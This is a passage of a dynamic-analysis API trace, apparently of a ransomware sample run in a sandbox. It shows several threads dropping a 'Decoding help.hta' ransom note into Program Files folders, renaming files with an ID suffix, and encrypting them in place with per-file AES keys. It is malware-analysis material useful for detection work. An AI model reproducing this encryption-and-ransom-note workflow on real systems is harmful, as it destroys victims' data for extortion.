lpFindFileData=0x25cdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.841] lstrcpyW (in: lpString1=0x25450550, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*.*" [0056.841] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*.*") returned 63 [0056.841] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Decoding help.hta" [0056.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\decoding help.hta")) returned 0xffffffff [0056.841] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xadc [0058.318] WriteFile (in: hFile=0xadc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x25cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x25cdfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.319] CloseHandle (hObject=0xadc) returned 1 [0058.319] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.320] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.320] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.320] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*.*" [0058.320] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*.*") returned 63 [0058.320] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg" [0058.320] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg" [0058.320] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.320] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xadc [0058.320] CreateFileMappingA (hFile=0xadc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xae0 [0058.321] CryptAcquireContextA (in: phProv=0x25cdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x25cdfcec*=0x2aac5340) returned 1 [0060.198] CryptGenKey (in: hProv=0x2aac5340, Algid=0x6610, dwFlags=0x1, phKey=0x25cdfce8 | out: phKey=0x25cdfce8*=0x6714f0) returned 1 [0060.198] CryptExportKey (in: hKey=0x6714f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x25cdfbe4, pdwDataLen=0x25cdfce4 | out: pbData=0x25cdfbe4*, pdwDataLen=0x25cdfce4*=0x2c) returned 1 [0060.198] MapViewOfFile (hFileMappingObject=0xae0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.151] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x25cdfbe4*, pdwDataLen=0x25cdfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x25cdfbe4*, pdwDataLen=0x25cdfcf8*=0x100) returned 1 [0064.151] CryptEncrypt (in: hKey=0x6714f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x25cdfce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x25cdfce4*=0x140) returned 1 [0064.151] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.154] CloseHandle (hObject=0xae0) returned 1 [0064.154] CryptDestroyKey (hKey=0x6714f0) returned 1 [0064.154] CryptReleaseContext (hProv=0x2aac5340, dwFlags=0x0) returned 1 [0064.154] SetFilePointerEx (in: hFile=0xadc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.154] WriteFile (hFile=0xadc, lpBuffer=0x25cdfbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x25cdfcf8, lpOverlapped=0x0) Thread: id = 822 os_tid = 0xb64 [0054.552] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*.*", lpFindFileData=0x25e1fd30 | out: lpFindFileData=0x25e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5863dfb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd3478ee0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd3478ee0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7dd0 [0055.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.509] FindNextFileW (in: hFindFile=0x5d7dd0, lpFindFileData=0x25e1fd30 | out: lpFindFileData=0x25e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5863dfb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd3478ee0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd3478ee0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.509] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.509] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.509] FindNextFileW (in: hFindFile=0x5d7dd0, lpFindFileData=0x25e1fd30 | out: lpFindFileData=0x25e1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd3478ee0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0xa1c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0055.509] lstrcpyW (in: lpString1=0x5e48ae0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*.*" [0055.509] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*.*") returned 98 [0055.509] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Decoding help.hta" [0055.509] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\decoding help.hta")) returned 0xffffffff [0055.509] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbec [0058.408] WriteFile (in: hFile=0xbec, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x25e1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x25e1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.409] CloseHandle (hObject=0xbec) returned 1 [0058.409] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.409] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll") returned -1 [0058.409] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll") returned 64 [0058.409] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.409] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*.*" [0058.409] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*.*") returned 98 [0058.409] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\", lpString2="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll" [0058.409] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll" [0058.409] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.409] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v10.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v10.0.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.410] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v10.0.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbec [0058.411] CreateFileMappingA (hFile=0xbec, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xbf0 [0058.411] CryptAcquireContextA (in: phProv=0x25e1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x25e1fcec*=0x2aac5f78) returned 1 [0060.212] CryptGenKey (in: hProv=0x2aac5f78, Algid=0x6610, dwFlags=0x1, phKey=0x25e1fce8 | out: phKey=0x25e1fce8*=0x5fca6a0) returned 1 [0060.212] CryptExportKey (in: hKey=0x5fca6a0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x25e1fbe4, pdwDataLen=0x25e1fce4 | out: pbData=0x25e1fbe4*, pdwDataLen=0x25e1fce4*=0x2c) returned 1 [0060.212] MapViewOfFile (hFileMappingObject=0xbf0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa1c0) returned 0x3a60000 Thread: id = 823 os_tid = 0xb74 [0054.552] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*.*", lpFindFileData=0x25f5fd30 | out: lpFindFileData=0x25f5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab67eab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa15a10e8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f14100 [0062.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.530] FindNextFileW (in: hFindFile=0x10f14100, lpFindFileData=0x25f5fd30 | out: lpFindFileData=0x25f5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab67eab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa15a10e8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.530] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.530] FindNextFileW (in: hFindFile=0x10f14100, lpFindFileData=0x25f5fd30 | out: lpFindFileData=0x25f5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72858c15, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72858c15, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xab3, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 Thread: id = 824 os_tid = 0xb6c [0054.553] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*.*", lpFindFileData=0x2609fd30 | out: lpFindFileData=0x2609fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d24dcb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b668 [0061.347] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.347] FindNextFileW (in: hFindFile=0x10a4b668, lpFindFileData=0x2609fd30 | out: lpFindFileData=0x2609fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d24dcb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.347] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.348] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.348] FindNextFileW (in: hFindFile=0x10a4b668, lpFindFileData=0x2609fd30 | out: lpFindFileData=0x2609fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xe1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.348] lstrcpyW (in: lpString1=0x24faf2f0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*.*" [0061.348] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*.*") returned 69 [0061.348] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\Decoding help.hta" [0061.348] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\decoding help.hta")) returned 0xffffffff [0061.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.690] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2609fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2609fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.693] CloseHandle (hObject=0xe6c) returned 1 [0061.693] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 825 os_tid = 0xb78 [0054.553] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*.*", lpFindFileData=0x261dfd30 | out: lpFindFileData=0x261dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da978 [0056.840] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.840] FindNextFileW (in: hFindFile=0x5da978, lpFindFileData=0x261dfd30 | out: lpFindFileData=0x261dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.840] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.840] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.840] FindNextFileW (in: hFindFile=0x5da978, lpFindFileData=0x261dfd30 | out: lpFindFileData=0x261dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.840] lstrcpyW (in: lpString1=0x10f1ceb0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*.*" [0056.840] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*.*") returned 63 [0056.840] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Decoding help.hta" [0056.840] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\decoding help.hta")) returned 0xffffffff [0056.841] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xad0 [0058.315] WriteFile (in: hFile=0xad0, lpBuffer=0x403006*, 